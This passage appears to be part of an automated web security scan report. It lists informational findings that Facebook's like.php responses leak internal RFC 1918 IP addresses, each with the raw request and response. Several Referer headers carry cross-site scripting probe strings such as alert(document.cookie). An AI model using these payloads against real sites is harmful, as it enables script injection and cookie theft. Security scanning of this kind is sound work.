<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.43. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.226.41
X-Cnection: close
Date: Mon, 16 May 2011 01:53:50 GMT
Content-Length: 6429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.44. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.180.107
X-Cnection: close
Date: Mon, 16 May 2011 10:41:53 GMT
Content-Length: 6484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.45. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.21.119
X-Cnection: close
Date: Mon, 16 May 2011 10:23:40 GMT
Content-Length: 6429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.46. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.167.103
X-Cnection: close
Date: Mon, 16 May 2011 10:41:53 GMT
Content-Length: 6486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.47. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.154.110
X-Cnection: close
Date: Mon, 16 May 2011 10:42:01 GMT
Content-Length: 6489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.48. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.156.118
X-Cnection: close
Date: Mon, 16 May 2011 10:41:33 GMT
Content-Length: 6497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.49. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.157.103
X-Cnection: close
Date: Mon, 16 May 2011 10:41:52 GMT
Content-Length: 6486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.50. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.160.107
X-Cnection: close
Date: Mon, 16 May 2011 10:40:46 GMT
Content-Length: 6503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.51. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.25.128
X-Cnection: close
Date: Mon, 16 May 2011 10:23:40 GMT
Content-Length: 6431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.52. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.150.119
X-Cnection: close
Date: Mon, 16 May 2011 10:42:01 GMT
Content-Length: 6489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.53. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.190.101
X-Cnection: close
Date: Mon, 16 May 2011 10:40:47 GMT
Content-Length: 6501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.54. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.179.114
X-Cnection: close
Date: Mon, 16 May 2011 10:41:52 GMT
Content-Length: 6486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.55. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.185.120
X-Cnection: close
Date: Mon, 16 May 2011 10:40:46 GMT
Content-Length: 6503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.56. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.125.29
X-Cnection: close
Date: Mon, 16 May 2011 01:53:51 GMT
Content-Length: 6431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.57. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501173&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.172.102
X-Cnection: close
Date: Mon, 16 May 2011 10:41:32 GMT
Content-Length: 6499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.58. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FBlueNile&layout=standard&show_faces=false&action=like&font=arial&colorscheme=light&width=922&height=24 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/engagement-rings?track=head
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.235.121
X-Cnection: close
Date: Mon, 16 May 2011 10:23:50 GMT
Content-Length: 8576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.59. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.194.125
X-Cnection: close
Date: Mon, 16 May 2011 10:42:02 GMT
Content-Length: 6487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.60. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.182.131
X-Cnection: close
Date: Mon, 16 May 2011 10:42:02 GMT
Content-Length: 6487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.61. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

